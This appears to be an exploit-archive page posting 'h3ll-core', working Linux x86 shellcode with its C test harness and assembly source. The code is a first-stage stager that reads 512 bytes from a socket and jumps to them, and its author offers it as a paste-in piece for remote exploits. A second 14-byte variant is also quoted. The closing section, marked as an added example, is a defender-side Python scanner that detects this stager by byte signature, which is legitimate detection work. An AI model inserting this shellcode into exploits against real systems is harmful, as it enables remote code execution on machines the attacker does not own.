
h3ll-core.c

Posted Nov 8, 2005
Authored by Charles Stevenson | Site bokeoa.com

if(read(fd,buf,512)<=2) _exit(1) else buf(); shellcode for Linux x86. h3ll-core.s is appended.

tags | x86, shellcode
systems | linux
MD5 | 5643743d10693800b28954d82ed00a38

/* h3ll-core.c by Charles Stevenson <core@bokeoa.com>
 *
 * I made this as a chunk you can paste in to make modular remote
 * exploits. I use it as a first stage payload when I desire to
 * follow up with a real large payload of goodness. This actually
 * is a bit larger than necessary because of the error checking but
 * in some cases proves nice. For a tiny version of the same theme
 * check out mcb's 14 byte (saving of 15 bytes for all you
 * mathematicians out there ;). The only problem might be that his
 * reads from stdin and can only read 385 bytes less than mine. So
 * if you like to go big on the shellcode use mine... otherwise here's
 * mcb's (or comment out the delimited lines below to shrink mine):
 *
 * "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4"
 *
 * I assume the file descriptor is in %esi. Since that's where it
 * was on the last exploit I wrote. Change the instruction to
 * the appropriate register from your fndsckcode or put an int in
 * there for an fd that's always the same.
 */
#include <stdio.h>
#include <string.h>

char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */
    // uncomment the following line to raise SIGTRAP in gdb
    // "\xcc"         // int3
    // 22 bytes:
    // if (read(fd,buf,512) <= 0x2) _exit(1) else buf();
    "\x31\xdb"        // xor %ebx,%ebx      ebx = 0
    "\xf7\xe3"        // mul %ebx           eax = edx = 0
    "\x42"            // inc %edx           edx = 1
    "\xc1\xe2\x09"    // shl $0x9,%edx      edx = 1 << 9 = 512 (read count)
    "\x31\xf3"        // xor %esi,%ebx      ebx = fd (optional, assumes fd in esi)
    "\x04\x03"        // add $0x3,%al       eax = __NR_read
    "\x54"            // push %esp
    "\x59"            // pop %ecx           ecx = buf (current stack pointer)
    "\xcd\x80"        // int $0x80          eax = read(fd, buf, 512)
    "\x3c\x02"        // cmp $0x02,%al      (optional error check)
    "\x7e\x02"        // jle exit           (optional exit clean)
    "\xff\xe1"        // jmp *%ecx          buf()
    // 7 bytes _exit(1) (optional _exit(1);)
    "\x31\xc0"        // xor %eax,%eax
    "\x40"            // inc %eax           eax = __NR_exit
    "\x89\xc3"        // mov %eax,%ebx      status = 1
    "\xcd\x80"        // int $0x80
    ;

int main(void)
{
    /* hellcode[] sits in a writable data section, so running it this way
     * needs executable data/stack (e.g. built with -z execstack); the
     * read() inside uses whatever happens to be in %esi at this point. */
    void (*shell)(void) = (void (*)(void))hellcode;
    printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n"
           "\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n",
           (int)strlen(hellcode));
    shell();
    return 0;
}

# h3ll.s by core@bokeoa.com based on some code zen-parse helped me to
# write a few years ago.. this is especially tuned for pulltheplug fu
# challenge #3 it reads 512 bytes of shellcode onto the stack and calls
# it and i also implemented some error checking!

.globl main
main:
    int3                # SIGTRAP to gdb (drop when not debugging)
    xor %ebx,%ebx       # ebx = 0
    mul %ebx            # eax = edx = 0
    inc %edx            # 1 << 9 == 512 bytes
    shl $0x9,%edx       #
    xor %esi, %ebx      # fd stored in %esi
    add $0x3,%al        # __NR_read
    push %esp           # pointer to sp
    pop %ecx            #
    int $0x80           # count = read(fd,buf,512)
    cmpb $0x2, %al      # if (count <= 2)
    jle exit            #     _exit(1)
    jmp *%ecx           # else buf()
exit:
    xor %eax,%eax
    inc %eax            # __NR_exit
    mov %eax,%ebx       # status = 1
    int $0x80
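The stager above has a small invariant core (zero the registers, shift 1 left by 9 for the 512-byte count, push/pop %esp into %ecx, int $0x80, then jmp *%ecx) around which the author marks two optional pieces and one swappable fd-loading instruction. That structure is exactly what a detection signature should key on, so here is an added example, written for this page and not part of Charles Stevenson's files, of a defender-side static scanner that pulls the \xNN literals out of a C listing and flags this read-and-jump family in a byte buffer. The byte values come straight from the listing; the assumption that the fd-loading slot may hold any 1-6 byte instruction, and the function names, are mine.

```python
"""Static scanner for the h3ll-core read-then-jump stager family.
Added example for this page (not the author's code)."""
import re

# --- signature components, copied byte-for-byte from the hellcode[] listing ---
SETUP = b"\x31\xdb\xf7\xe3\x42\xc1\xe2\x09"   # xor %ebx,%ebx ; mul %ebx ; inc %edx ; shl $9,%edx
CALL  = b"\x04\x03\x54\x59\xcd\x80"           # add $3,%al ; push %esp ; pop %ecx ; int $0x80
CHECK = b"\x3c\x02\x7e\x02"                   # cmp $2,%al ; jle exit      (optional on the page)
JMP   = b"\xff\xe1"                           # jmp *%ecx
EXIT  = b"\x31\xc0\x40\x89\xc3\xcd\x80"       # xor %eax,%eax ; inc %eax ; mov %eax,%ebx ; int $0x80

# Between SETUP and CALL sits the one instruction that loads the fd into %ebx.
# The page uses xor %esi,%ebx (2 bytes) but tells the reader to swap in whatever
# register or constant fits, so we accept any 1-6 byte sequence there
# (assumption made for this example, not stated on the page).
STAGER_RE = re.compile(
    re.escape(SETUP) + b"(?P<fd>.{1,6}?)" + re.escape(CALL)
    + b"(?P<check>" + re.escape(CHECK) + b")?" + re.escape(JMP)
    + b"(?P<exit>" + re.escape(EXIT) + b")?",
    re.DOTALL,
)

_LITERAL_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')


def extract_hex_literals(c_source: str) -> bytes:
    """Concatenate every "\\xNN..." string literal in a C listing into raw bytes.
    Text after a // marker on each line is ignored (block comments are not handled)."""
    out = bytearray()
    for line in c_source.splitlines():
        code = line.split("//", 1)[0]
        for lit in _LITERAL_RE.findall(code):
            out += bytes.fromhex(lit.replace("\\x", ""))
    return bytes(out)


def find_stagers(blob: bytes) -> list:
    """Return one record per stager found: where it is, how long it is, which
    optional pieces are present, and the read size implied by the shl immediate."""
    hits = []
    for m in STAGER_RE.finditer(blob):
        hits.append({
            "offset": m.start(),
            "length": m.end() - m.start(),
            "fd_insn": m.group("fd"),
            "has_error_check": m.group("check") is not None,
            "has_exit_stub": m.group("exit") is not None,
            "read_size": 1 << SETUP[-1],       # shl $0x9 -> 512 bytes
        })
    return hits


# Constructed sample input: the hellcode[] literal lines as they appear in the
# listing above, pasted verbatim so the scanner can be exercised offline.
SAMPLE_C = r'''
char hellcode[] =
    // "\xcc"         // int3
    "\x31\xdb"        // xor %ebx,%ebx
    "\xf7\xe3"        // mul %ebx
    "\x42"            // inc %edx
    "\xc1\xe2\x09"    // shl $0x9,%edx
    "\x31\xf3"        // xor %esi,%ebx
    "\x04\x03"        // add $0x3,%al
    "\x54"            // push %esp
    "\x59"            // pop %ecx
    "\xcd\x80"        // int $0x80
    "\x3c\x02"        // cmp $0x02,%al
    "\x7e\x02"        // jle exit
    "\xff\xe1"        // jmp *%ecx
    "\x31\xc0"        // xor %eax,%eax
    "\x40"            // inc %eax
    "\x89\xc3"        // mov %eax,%ebx
    "\xcd\x80"        // int $0x80
    ;
'''

if __name__ == "__main__":
    blob = extract_hex_literals(SAMPLE_C)
    print(f"{len(blob)} bytes extracted")
    for hit in find_stagers(blob):
        print(hit)
```

Run as a script it reports a 29-byte blob with one hit at offset 0 carrying both the error check and the exit stub. The same `find_stagers` call works on any captured buffer (a packet payload, a memory dump); the optional groups let it still fire on the trimmed 18-byte variant the author describes, while a different byte in the shift immediate or the syscall sequence correctly does not match, which is the trade-off of a structural signature over a plain byte string.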
